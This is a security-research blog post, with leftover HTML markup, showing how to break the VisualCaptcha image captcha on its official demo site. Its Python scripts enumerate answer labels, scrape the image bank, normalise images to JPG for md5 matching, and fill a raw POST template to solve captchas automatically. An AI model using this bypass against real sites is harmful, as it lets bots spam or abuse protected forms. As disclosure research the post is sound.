tl;dr : Breaking 100%\u00a0VisualCaptcha.net<\/a>\u00a0with GitHub scripts available here<\/a>\u00a0[Demonstration video<\/a>].<\/strong><\/span><\/p>\n Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) is a very popular mechanism attached to “security through obscurity<\/a>” to protect against bots and attacks by automated scripts. The idea is to ensure that the processing performed by a user is done by a “human” and not by a program (Turing test).<\/p>\n Concretely, in the web world, captchas can protect the submission of forms, including:<\/p>\n Captchas integrate additional control which the user (customer) must meet. The answer is subsequently verified server side (session) and valid or invalid form submission.<\/p>\n Many forms of captchas exist, the most commonly used are\u00a0:<\/p>\n Captcha dynamic<\/p><\/div>\n In the form of dynamically generated images (GD2), letters, numbers and sometimes symbols are visible on these captchas. “Noise” is added to the image, randomly, to prevent the automation of deciphering them via image analysis libraries like OCR<\/a>.<\/p>\n Image distortion, noise, pixelation, random background, these techniques also apply to sound clips with noise, robotic voices, etc; more suitable for people\u00a0visually deficient.<\/p>\n These captchas are the most common but least appreciated by people… Image analysis libraries (OCR) are becoming more efficient to break these captchas and to counter these tools, the complexity of captchas including noise altering the image is intensified to remain robust, while making the decoding task to the end user drastically more difficult …<\/p>\n Captcha questions<\/p><\/div>\n These captchas, as images, text or sound, ask\u00a0a question, an enigma, a formula or a problem to the user that only a human (theoretically) can answer. Note the captchas mathematical calculations (audio \/ image) or the mini games as puzzle.<\/p>\n <\/p>\n Captcha visual<\/p><\/div>\n This form of captcha more recent reconciles many users with this security mechanism for its simplicity. The idea is to observe a series of images, and choose the image adapted to the specified word. Eg “click on the glasses”, or “what images show horses.” These captchas are most popular for their ease of access to the new touch devices like smartphone or tablet, where you just “touch” an image and not to rewrite a sequence of characters.<\/p>\n The solution “VisualCaptcha” detailed in the article is included in this category.<\/strong><\/p>\n Captcha comportemental<\/p><\/div>\n This category is young. Very few solutions exist (in particular open-source). But it nevertheless remains particularly robust if properly implemented. The new version of “reCAPTCHA<\/a>“, designed by Google, fully illustrates this principle.<\/p>\n The captcha is enabled by a simple “click” in a box (checkbox). After that click, analysis of user behavior ensues before validating or not the captcha. Mouse movement, entropy, features of the browser, screen resolution, referer, user-agent, all these parameters allow finely identify a user as\u00a0a “human” versus a “robot”.<\/p>\n Captchas therefore provide the “security through obscurity” (much discussed security practice), but they also allow:<\/p>\n VisualCaptcha is an open-source reference solution for the development of simple visual captchas through a multitude of technologies. Provided by visualcaptcha.net<\/a> supported by emotionLoop<\/a> and Clevertech<\/a>, this solution is available (and supported) in PHP<\/a>, Angulars.JS, JQuery, NodeJS, VanillaJS, Ruby, Django, Python, backend and frontend side, but also scope (non- officially) on ASP.NET, Java, Laravel, CakePHP, SailsJS, Grails, Meteor, etc. Some famous\u00a0CMS integrate it as plugins, like WordPress<\/a>. (See VisualCaptcha GitHub<\/a>)<\/p>\n In other words, this captcha solution easily interfaces with all types of projects and attracted more than one developer and users for its ease of use via the touch devices.<\/p>\n VisualCaptcha features<\/p><\/div>\n VisualCaptcha was partially broken in the past<\/a> (August 14, 2013, version <4.2.0), but the success rate was not 100%. Rebelote in 2014<\/a> and 2015<\/a>. But none of these techniques provided a generic script, adaptable and configurable, compatible with any proxy like\u00a0Burp. In addition, these solutions were based on the analysis via\u00a0OCR or using image analysis libraries, and thus turn out to be slower than what I propose.<\/p>\n To list “some websites<\/a>” that use VisualCaptcha, do the following search in Google (with the quotes):<\/p>\n Note<\/strong>: in this article, only the “breaking” of images mechanism is presented. Maybe the method via the audio will follow \ud83d\ude09 !<\/p>\n Most implementations of VisualCaptcha, whatever the technology (PHP, Java, etc.), show the same operating principle. To illustrate this article, the official demo page for the latest version of VisualCaptcha will be the “target” (demo.visualcaptcha.net<\/a>).<\/p>\n VisualCaptcha demo page<\/p><\/div>\n Once a page of a website is reached and is equipped with “VisualCaptcha” solution, a JavaScript code in the page load the captcha. This loading in the DOM generates an asynchronous request (AJAX) to a URL (endpoint) which is by default “\/start”:<\/p>\n VisualCaptcha AJAX call \/start<\/p><\/div>\n This call to “\/start” has parameters:<\/p>\n This call AJAX “\/start\/5?r=XXXXXXXXXXXX<\/a>” returns JSON which is interpreted by the DOM to generate the current visual captcha. Example of JSON returned:<\/p>\n JSON details:<\/p>\n Let’s play a little with “\/start”, ask it\u00a0to show only a single image (thus automatically captcha solution, right?):<\/p>\n JSON\u00a0:<\/p>\n Ah. Although requested a single image using the “1” still was a “values” list of 4 values. This protection is inherent to VisualCaptcha. Older versions allowed to display only 2 minimum (therefore one chance in two).<\/p>\n Trying to display\u00a010000 values:<\/p>\n JSON :<\/p>\n We do not have 10000 values but only 37 (default maximum number of images in the image bank of VisualCaptcha).<\/p>\n This is the weakness of visual captchas: a library of images (and sounds) of fixed size.<\/strong><\/p>\n With\u00a0the same parameter “?r=XXXXXXXXXXXX” between the same two calls to “\/start”, the results returned for “values” or even other fields are constantly random and unique.<\/p>\n On the HTML source code side, the source returned by the call to the page protected by CAPTCHA is itself uses JavaScript scripts to initialize the captcha in the DOM. By consulting the DOM can be observed that the value JSON “imageName” (the picture label to click) is reflected and displayed:<\/p>\n VisualCaptcha source code 01<\/p><\/div>\n In addition, the value of the random string\u00a0“?r=XXXXXXXXXXXX” used during initialization of the captcha by AJAX “\/start” is used again to retrieve each image to display “\/image\/0?r= XXXXXXXXXXXX” until to “\/image\/4?r=XXXXXXXXXXXX” (or “5” images because “\/start\/5”).<\/p>\n The random name of the hidden text field that contains the value of the clicked image is also present:<\/p>\n VisualCaptcha source code 02<\/p><\/div>\n When you click on the first image displayed (\/image\/0), is the first JSON value of “values” that is injected into the hidden field result.<\/p>\n VisualCaptcha source code 03<\/p><\/div>\n When you click on the last image (\/image\/4), this is the last JSON value of “values” that is injected into the hidden field result. The values “values” of JSON are ordered in the same way as the index of\u00a0display each image.<\/p>\n VisualCaptcha source code 04<\/p><\/div>\n If one submits the form, it has our hidden field whose name is the value of “imageFieldName” with value POST that of the corresponding image in “values”:<\/p>\n Obviously, this POST data capture is specific to VisualCaptcha demonstration portal. On other sites with VisualCaptcha, transmission validation captcha may be different (GET, POST multipart \/ form-data, etc.).<\/p>\n In the case of the demo page of VisualCaptcha, if the captcha submitted POST to the endpoint “\/try” is valid or invalid, then a 302 redirect is made to:<\/p>\n VisualCaptcha demo results<\/p><\/div>\n In summary\u00a0:<\/p>\n Well, now what? With this analysis we have everything needed to automate the resolution via a script of any captcha produced by VisualCaptcha!<\/p>\n Captcha me if you can !<\/p><\/blockquote>\n To break any VisualCaptcha, it is necessary to perform several steps ahead. Most of these steps are automated and are quickly, however a manual task awaits …<\/p>\n First step, we need to list all possible “text” answers implemented in VisualCaptcha.<\/p>\n If VisualCaptcha solution has been implemented on a site or application without much customization, then the images as text responses are surely those by default, ie the number 37 with labels like :<\/p>\n Airplane, Balloons, Camera, Car, Cat, Chair, Clip, Clock, Cloud, Computer, Envelope, Eye, Flag, Folder, Foot, Graph, House, Key, Leaf, Light Bulb, Lock, Magnifying Glass, Man, Music Note, Pants, Pencil, Printer, Robot, Scissors, Sunglasses, T-Shirt, Tag, Tree, Truck, Umbrella, Woman, World<\/p><\/blockquote>\n How can we recover and check all the answers included in\u00a0VisualCaptcha?<\/p>\n Simple, we question a lot of times the endpoint “\/start” (1000 requests) to retrieve all the values of “imageName”. We put these values into an array, sort the array and delete all same value to finaly display the results.<\/p>\n Python script (available here<\/a>) :<\/p>\n Example output for the demo portal (in English):<\/p>\n The set of possible answers are now in our possession (increase the number of requests to “\/start” to be sure to have all possible answers).<\/p>\n The other step after recovery of all possible text responses is to download the entire image database.<\/p>\n If the initialization of the captcha is done via the\u00a0call “\/start\/5?r=XXXXXXXXXXXX”, then you will have\u00a05 distinct images accessible through these URLs:<\/p>\n The image “\/image\/5<\/strong>?r=XXXXXXXXXXXX” does not exist (404) because the “\/start” with the session key “XXXXXXXXXXXX” will have been initialized with “5”.<\/p>\n We must therefore make a request to “\/start” with high image request as 10000. Or more precisely with the exact number of possible images that have been previously determined (37): “\/start\/37?r=XXXXXXXXXXXX “. The 37 images are recoverable via URLs:<\/p>\n Small Python script to download all images in one “.\/imgPng” directory previously created (available here<\/a>)<\/p>\n Let’s take a look at our directory:<\/p>\n VisualCaptcha pictures<\/p><\/div>\n Perfect ! Time to move on!<\/p>\n Why this chapter? We have all the bank of images in PNG, so why convert them\u00a0to JPG?<\/p>\n The reason is very simple. April 30, 2014, a “major” changes VisualCaptcha emerged. This is discussed on this topic<\/a>. The developers of the solution have added extra random bytes (1 to 50) in the pictures whenever they are displayed (for example “the printer”). In other words, all previously downloaded image library is not comparable to any other library of images downloaded again in another folder.<\/p>\n “Compare to what?”<\/p><\/blockquote>\n The idea is to calculate the checksum (md5sum) of each “same” PNG image (always the example of the printer), and due to the addition of this random byte (s) influencing the size of each image, these checksums are all different …<\/p>\n Example of the printer image recovered 3 times (printer1.png, printer2.png and printer3.png) after multiple page refreshing:<\/p>\n Although these 3 images visually represent identically the same printer, size (files) will vary slightly because of random bytes added by VisualCaptcha … So the comparison with “checksum” is not possible with\u00a0PNG. ..<\/p>\n This new VisualCaptcha protection technique only appeared following this topic<\/a> (source code here<\/a>). Older versions do not apply these changes, and therefore each “checksum” returning the same value.<\/p>\n To work around this protection, the idea is to convert each PNG to JPG!<\/strong><\/p>\n The conversion to JPG will change\u00a0the image size (in bytes, not px), delete unnecessary data and reproduce a fully valid JPG file. Certainly the images will lose their transparency and quality but this is not important to break captchas \ud83d\ude42<\/p>\n Python script PNG2JPG:<\/p>\n CheckSums results:<\/p>\n This is good! JPEG checksums are identical in our 3 different images in PNG yet! Check our JPG:<\/p>\n VisualCaptcha pictures JPG<\/p><\/div>\n They have lost some quality and transparency, but they are unique, distinctive and visible (with comparable checksums). That’s enough for the continuation of our operations!<\/p>\n We have\u00a0the total number of images, all images in JPG, and all the textual labels that VisualCaptcha offers. Let’s create the correspondence table (manual task, sorry…) between each checksum and text label:<\/p>\n Script available here<\/a>.<\/p>\n From all these checksums JPG \/ PNG, it is necessary to produce the dictionary (Python) below. For this you will need to consult each image and manually association with the corresponding text label:<\/p>\n Our dictionary is ready (see this script<\/a>)! Just go\u00a0to cracking \/ breaking VisualCaptcha.<\/p>\n How the process will be done? You have a form (sending mail, registration, password reset, etc.) protected with VisualCaptcha. You collected all the labels, all images converted into JPG, and created the lookup table.<\/p>\n Now, you have to produce the form submission POST request (in the example, that of “demo.visualcaptcha.net”) with the correct POST variable name and good POST\u00a0value.<\/p>\n Well, the last script presented here will automate this. The idea will be to:<\/p>\n We put all this in a script, and test directly on the demo portal “demo.visualcaptcha.net”. As a reminder, according to the captcha submited, the “\/try” endpoint makes\u00a0a 302 redirect to:<\/p>\n To make this script VisualCaptchaBreaker as possible generic, the idea was to pass an HTTP request in raw format in the script input, changing the field that the script should automatically replaced with the values of captcha broken.<\/p>\n So (via Burp for example), record the final query in a text file and change the name \/ value captcha by the variables “%VISUALCAPTCHANAME%” and “%VISUALCAPTCHAVALUE%”:<\/p>\n This example<\/a> use standard POST data, another example with\u00a0POST multipart\/form-data<\/a>\u00a0is here.<\/p>\n Download\u00a0the latest VisualCaptchaBreaker, and run the script:<\/p>\nIntroduction<\/h1>\n
Quick\u00a0introduction to\u00a0CAPTCHAs<\/h2>\n
\n
Dynamical\u00a0captchas<\/h3>\n
![\"Captcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha-dynamique-300x225.jpg\")
<\/a>Captchas-questions<\/h3>\n
![\"Captcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha-question-300x111.jpg\")
<\/a>Visual captchas<\/h3>\n
![\"Captcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha-visual-300x137.jpg\")
<\/a>Behavioral captchas<\/h3>\n
![\"Captcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/hero-recaptcha-demo-300x80.gif\")
<\/a>\n
VisualCaptcha.net<\/h2>\n
![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/VisualCaptcha_features-300x264.png\")
<\/a>\"Type below-the answer to what you hear\"<\/pre>\n
VisualCaptcha analysis<\/h1>\n
Demonstration<\/h2>\n
![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/visualcaptcha_demopage-300x264.png\")
<\/a>![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/visualcaptcha_ajaxcall_start-300x58.png\")
<\/a>Endpoint \/start<\/h2>\n
\n
{\"values\":[\"24239a51db01af9d6707\",\"9617b92787a57a7918bf\",\"4f324b253b4674485513\",\"98c45edf9acada1ef257\",\"bce9f9d372f216def7f8\"],\"imageName\":\"Envelope\",\"imageFieldName\":\"795ee2a12bae97841d9a\",\"audioFieldName\":\"6b49c3a5506179310192\"}<\/pre>\n\n
http:\/\/demo.visualcaptcha.net\/start\/1?e=XXXXXXXXXXXX<\/pre>\n
{\"values\":[\"4fdb619a10e4cc307a9d\",\"fb1138601a50a456c249\",\"57147d3f3d180e022679\",\"098028448f30e8cf649f\"],\"imageName\":\"Chair\",\"imageFieldName\":\"13b35f036cd8b4fee7e6\",\"audioFieldName\":\"7cb7dff15986787bc996\"}<\/pre>\nhttp:\/\/demo.visualcaptcha.net\/start\/10000?e=XXXXXXXXXXXX<\/pre>\n
{\"values\":[\"d52d1fb0c0d67daa5ca3\",\"52972cd3f13da0719165\",\"4013db4b92877ad315ba\",\"c8e3409f7d8d5650839f\",\"7a6c0fdd85ef69d18eec\",\"64ed58f8031cc328ceca\",\"3df0d18701d01a90e55c\",\"8c49a2149e34ce3d6ee5\",\"db8e89648eed5f30ef70\",\"8aa95e4b96629a5eb67d\",\"2cd4f3dfa2268675cabd\",\"5a5bbe52c82b42631ff5\",\"c409237882814913181f\",\"5a254d941f2b5fa33ef1\",\"5b7c6d5ae759252b393d\",\"f82f0cc7fbfc7cddad05\",\"2426c9217e5ae6710234\",\"a09c805b79766f0abd3d\",\"f0bb6c4157e3ca8bba87\",\"42f321d92e485f26532f\",\"e1ef6e1a80ed62802e76\",\"8827cd7526d5de5365ab\",\"943517aaf285873e0f91\",\"e31bb70331185fcd9f8f\",\"13356550e4145056b02b\",\"ebe45f07737e0a9fa43a\",\"9551f50f423a4527122f\",\"b748fb1a5c9c48546993\",\"2cb64d8ec2e7f7f75f16\",\"d95821b4efa05b9e72a6\",\"06f96ba47431866cf23b\",\"4816963df3b2892be7e1\",\"06076aca0faf1620e456\",\"0cfd08a3805e4c3e4303\",\"0014f442f65c3e5444cf\",\"af510edd3b4249556ea8\",\"a1c2e70a7b77217d20d0\"],\"imageName\":\"Envelope\",\"imageFieldName\":\"5ca5dd0b97c485d0e675\",\"audioFieldName\":\"ccbc0c1e534ed088927f\"}<\/pre>\nHTML\/DOM source code…<\/h2>\n
![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha001-300x191.png\")
<\/a>![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha002-300x191.png\")
<\/a>![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha003-300x191.png\")
<\/a>![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/captcha004-300x193.png\")
<\/a>Form submission and POST data<\/h2>\n
POST \/try HTTP\/1.1\r\nHost: demo.visualcaptcha.net\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko\/20100101 Firefox\/46.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\r\nAccept-Language: fr,en;q=0.8,fr_fr;q=0.5,en_us;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http:\/\/demo.visualcaptcha.net\/\r\nCookie: PHPSESSID=mit7fi867tj8lf0iiq24o4htk3\r\nConnection: close\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 52\r\n\r\n795ee2a12bae97841d9a=24239a51db01af9d6707&submit-bt=<\/pre>\n
\n
\nLocation: \/?status=validImage\u00a0<\/strong><\/span>(valid\u00a0captcha checked on\u00a0server side by the “\/try”)?<\/li>\n<\/ul>\n![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/demo_visualcaptcha-300x130.png\")
<\/a>Mini Analysis Summary<\/h2>\n
\n
Breaking VisualCaptcha<\/h1>\n
\n
Enumerate all the possibilities for text responses<\/h2>\n
import requests\r\nimport json\r\ntarget = \"http:\/\/demo.visualcaptcha.net\"\r\nnbRequest = 1000\r\nimagesNames = []\r\nfor i in range(0, nbRequest):\r\n session = requests.Session()\r\n response = session.get(target+\"\/start\/1\")\r\n data = json.loads(response.text)\r\n imagesNames.append(data[\"imageName\"])\r\nsortedImagesNames = sorted(set(imagesNames))\r\nprint \"[*] There are \" + str(len(sortedImagesNames)) + \" responses possible.\"\r\nfor name in sortedImagesNames:\r\n print name + \", \",<\/pre>\n
# python enum_VisualCaptcha_texts.py\r\n[*] There are 37 responses possible.\r\nAirplane, Balloons, Camera, Car, Cat, Chair, Clip, Clock, Cloud, Computer, Envelope, Eye, Flag, Folder, Foot, Graph, House, Key, Leaf, Light Bulb, Lock, Magnifying Glass, Man, Music Note, Pants, Pencil, Printer, Robot, Scissors, Sunglasses, T-Shirt, Tag, Tree, Truck, Umbrella, Woman, World<\/pre>\n
Recover the entire image database<\/h2>\n
\n
\n
import requests\r\nimport json\r\ntarget = \"http:\/\/demo.visualcaptcha.net\"\r\npathImgDb = \".\/imgPng\"\r\nsession = requests.Session()\r\nresponse = session.get(target+\"\/start\/10000?r=RaNdoMsTrInG\")\r\ndata = json.loads(response.text)\r\nnbImg = len(data[\"values\"])\r\nprint \"[*] There are \" + str(nbImg) + \" pictures in the VisualCaptcha database of [\" + target + \"]\"\r\nfor i in range(0, nbImg):\r\n imgReq = session.get(target+\"\/image\/\" + str(i) + \"?r=RaNdoMsTrInG\")\r\n if imgReq.status_code == 200:\r\n # Save the current PNG picture\r\n f = open(pathImgDb + \"\/\" + str(i) + \".png\", 'wb')\r\n f.write(imgReq.content)\r\n f.close()\r\n print \"[+] \" + pathImgDb + \"\/\" + str(i) + \".png download\"<\/pre>\n
![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/images_VisualCaptcha-300x70.png\")
<\/a>Convert all images form PNG to JPG<\/h2>\n
# md5sum printer*.png\r\ne31dead53ece8c2df18cac7518f6b89a \u00a0printer1.png\r\n086676587e026e3e7c8f86831657c0c8 \u00a0printer2.png\r\nfbee80e758f9c3f97f0937ae57376a25 \u00a0printer3.png<\/pre>\n
\/\/ Create a hex string from random bytes\r\n private function utilRandomHex( $count ) {\r\n return bin2hex( openssl_random_pseudo_bytes( $count ) );\r\n }<\/pre>\nimport Image\r\nim = Image.open(\"printer1.png\")\r\nim.save(\"printer1.jpg\", \"JPEG\")\r\nim = Image.open(\"printer2.png\")\r\nim.save(\"printer2.jpg\", \"JPEG\")\r\nim = Image.open(\"printer3.png\")\r\nim.save(\"printer3.jpg\", \"JPEG\")<\/pre>\n
4b6b62f3be8168abba5ad105eb086fb9 \u00a0printer1.jpg\r\n4b6b62f3be8168abba5ad105eb086fb9 \u00a0printer2.jpg\r\n4b6b62f3be8168abba5ad105eb086fb9 \u00a0printer3.jpg<\/pre>\n
\nConvert all images in the folder “.\/imgPng” to “.\/imgJpg” (script available here<\/a>)<\/p>\nimport Image\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimgPngDir = \".\/imgPng\"\r\nimgJpgDir = \".\/imgJpg\"\r\nimgPngFiles = [f for f in listdir(imgPngDir) if isfile(join(imgPngDir, f))]\r\nfor img in imgPngFiles:\r\n if img.endswith(\".png\"):\r\n im = Image.open(imgPngDir+\"\/\"+img)\r\n im.save(imgJpgDir + \"\/\" + img + \".jpg\", \"JPEG\")\r\n print \"[+] Original VisualCaptcha PNG [\" + imgPngDir + \"\/\" + img + \"] converted in JPG here [\" + imgJpgDir + \"\/\" + img + \".jpg]\"<\/pre>\n
![\"VisualCaptcha](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/images_VisualCaptcha_JPG-300x116.png\")
<\/a>Creating the correlation table checksums \/ labels<\/h2>\n
# md5sum .\/imgJpg\/*.jpg\r\nc17b70628392f6d696cc1b25f5fb386f .\/imgJpg\/0.png.jpg\r\nc4fe178b16c681fef26860d36410aff4 .\/imgJpg\/10.png.jpg\r\n0b80d90a8eae32c984481cfce01872f4 .\/imgJpg\/11.png.jpg\r\nfcf9b5602694bfd0e3a97036a700affc .\/imgJpg\/12.png.jpg\r\n446bf84f96960d03b4ed97ee4f60fc92 .\/imgJpg\/13.png.jpg\r\n76aea7d6235509a1ce3a04d168434eb8 .\/imgJpg\/14.png.jpg\r\n2a6a41f2f3b204c917fd03ee5a74cc2c .\/imgJpg\/15.png.jpg\r\n8edd4f6aba641a23545e242c4d00baf1 .\/imgJpg\/16.png.jpg\r\n9c4a256697476081b8eb34a05501ef2e .\/imgJpg\/17.png.jpg\r\naa7e561ebc0fba06d30f5ecdb55c0841 .\/imgJpg\/18.png.jpg\r\n943f4c78b35672d6fe2d8d7c7b16c2b2 .\/imgJpg\/19.png.jpg\r\n63c155f036c3a013362c527a055e258b .\/imgJpg\/1.png.jpg\r\n89b833eb55b97c717d9b0d9d12788233 .\/imgJpg\/20.png.jpg\r\n86666417338139368ca43a8963ebced2 .\/imgJpg\/21.png.jpg\r\n72a676cfde643c841232c76f60989090 .\/imgJpg\/22.png.jpg\r\n351eb8558342cdab5bd37c9aa5ed7ee0 .\/imgJpg\/23.png.jpg\r\n456780afb08cdaf562af8d89497bc875 .\/imgJpg\/24.png.jpg\r\n872af7339e75f6cae2313eb28aac9c44 .\/imgJpg\/25.png.jpg\r\nb7ca3af8c38fa6e4f9a0cb5ed89bc493 .\/imgJpg\/26.png.jpg\r\n44561c957ab6ea338bafa9d7a52d9992 .\/imgJpg\/27.png.jpg\r\n4b6b62f3be8168abba5ad105eb086fb9 .\/imgJpg\/28.png.jpg\r\n433cdaaf1e0ca0d8367727f7e7497c12 .\/imgJpg\/29.png.jpg\r\n6b99e64fe2b18c6ec388b8080bcd9947 .\/imgJpg\/2.png.jpg\r\nf5f79595f81967f383fa289e3e682c23 .\/imgJpg\/30.png.jpg\r\n1d42c40b62bf899b25f1cddade543658 .\/imgJpg\/31.png.jpg\r\necad2ea49116b86c4eea21f0cd076e62 .\/imgJpg\/32.png.jpg\r\neaa28a149864637c6d3bb7c58cdae136 .\/imgJpg\/33.png.jpg\r\n287c4df92b339bdedf65cea6fc7977f9 .\/imgJpg\/34.png.jpg\r\n35b1b173e847b202eedac99db3002da9 .\/imgJpg\/35.png.jpg\r\n65b32b9748014155896de24c2ba4a408 .\/imgJpg\/36.png.jpg\r\n93d5e02b511f42936c5d4873f6b064ea .\/imgJpg\/3.png.jpg\r\n39092d7718747b6f0b01cb7282d136bc .\/imgJpg\/4.png.jpg\r\n2739865da34888314752ee72ea97bf76 .\/imgJpg\/5.png.jpg\r\n139da71c5ac0954f668ff1947e73245f .\/imgJpg\/6.png.jpg\r\n6612e4fabfb7219ed0662d3901a50b4a .\/imgJpg\/7.png.jpg\r\n0985b57fb6a40d3142534f5e2c59d7f4 .\/imgJpg\/8.png.jpg\r\n17a86e0825bc56546efa762160af0d19 .\/imgJpg\/9.png.jpg<\/pre>\n
# For newer version of VisualCaptcha 5.x, picture database with 0-50 random bytes added need to be converted from PNG to JPG for right checksum value, so there are JPG and PNG checksum in the next dict.\r\n# Dictionary of key:value with :\r\n# labelEN = textual solution of the captcha in english (you may change these label for your language)\r\n# labelFR = textual solution of the captcha in french (you may change these label for your language)\r\n# md5SumPng = checkSum of the original picture in PNG\r\n# md5SumJpg = checkSum of the picture converted from PNG to JPG (to remove random bytes added by VisualCaptcha)\r\ndicoImg = {}\r\ndicoImg[0] = {\"labelEN\":u\"Airplane\", \"labelFR\":u\"l'avion\", \"md5SumPng\":\"6244aa85ad7e02e7a46544d5deab0225\", \"md5SumJpg\":\"c4fe178b16c681fef26860d36410aff4\"}\r\ndicoImg[1] = {\"labelEN\":u\"Balloons\", \"labelFR\":u\"le ballon\", \"md5SumPng\":\"4c3fbd0824a5f2f3c58069c0416755e7\", \"md5SumJpg\":\"c17b70628392f6d696cc1b25f5fb386f\"}\r\ndicoImg[2] = {\"labelEN\":u\"Camera\", \"labelFR\":u\"la camera\", \"md5SumPng\":\"00ab6b7f0972d5b5d2bef888ab198929\", \"md5SumJpg\":\"fcf9b5602694bfd0e3a97036a700affc\"}\r\ndicoImg[3] = {\"labelEN\":u\"Car\", \"labelFR\":u\"la voiture\", \"md5SumPng\":\"281398645bee48e8c78cf8f650dc830e\", \"md5SumJpg\":\"2a6a41f2f3b204c917fd03ee5a74cc2c\"}\r\ndicoImg[4] = {\"labelEN\":u\"Cat\", \"labelFR\":u\"le chat\", \"md5SumPng\":\"e3f67527bdff4b14a8297bb61e6b3c6a\", \"md5SumJpg\":\"89b833eb55b97c717d9b0d9d12788233\"}\r\ndicoImg[5] = {\"labelEN\":u\"Chair\", \"labelFR\":u\"la chaise\", \"md5SumPng\":\"6a385164d1f36e6c2e137c1fc11569bc\", \"md5SumJpg\":\"456780afb08cdaf562af8d89497bc875\"}\r\ndicoImg[6] = {\"labelEN\":u\"Clip\", \"labelFR\":u\"le trombone\", \"md5SumPng\":\"99be7138303ce797139a56c78e1b0143\", \"md5SumJpg\":\"aa7e561ebc0fba06d30f5ecdb55c0841\"}\r\ndicoImg[7] = {\"labelEN\":u\"Clock\", \"labelFR\":u\"l'horloge\", \"md5SumPng\":\"4039b8c0aa05f2c35402da5842e2a37c\", \"md5SumJpg\":\"6612e4fabfb7219ed0662d3901a50b4a\"}\r\ndicoImg[8] = {\"labelEN\":u\"Cloud\", \"labelFR\":u\"le nuage\", \"md5SumPng\":\"f25649f668fcc7ac37272ed5b6297087\", \"md5SumJpg\":\"76aea7d6235509a1ce3a04d168434eb8\"}\r\ndicoImg[9] = {\"labelEN\":u\"Computer\", \"labelFR\":u\"l'ordinateur\", \"md5SumPng\":\"a4672d1d019615d061e40ee2c93ee625\", \"md5SumJpg\":\"943f4c78b35672d6fe2d8d7c7b16c2b2\"}\r\n[...]<\/pre>\nBreaking\u00a0captchas !<\/h2>\n
\n
\n
POST \/try HTTP\/1.1\r\nHost: demo.visualcaptcha.net\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko\/20100101 Firefox\/46.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\r\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nReferer: http:\/\/demo.visualcaptcha.net\/\r\nCookie: PHPSESSID=MySeSsIoNIdCuStOm\r\nConnection: close\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 52\r\n\r\n%VISUALCAPTCHANAME%=%VISUALCAPTCHAVALUE%&submit-bt=<\/pre>\n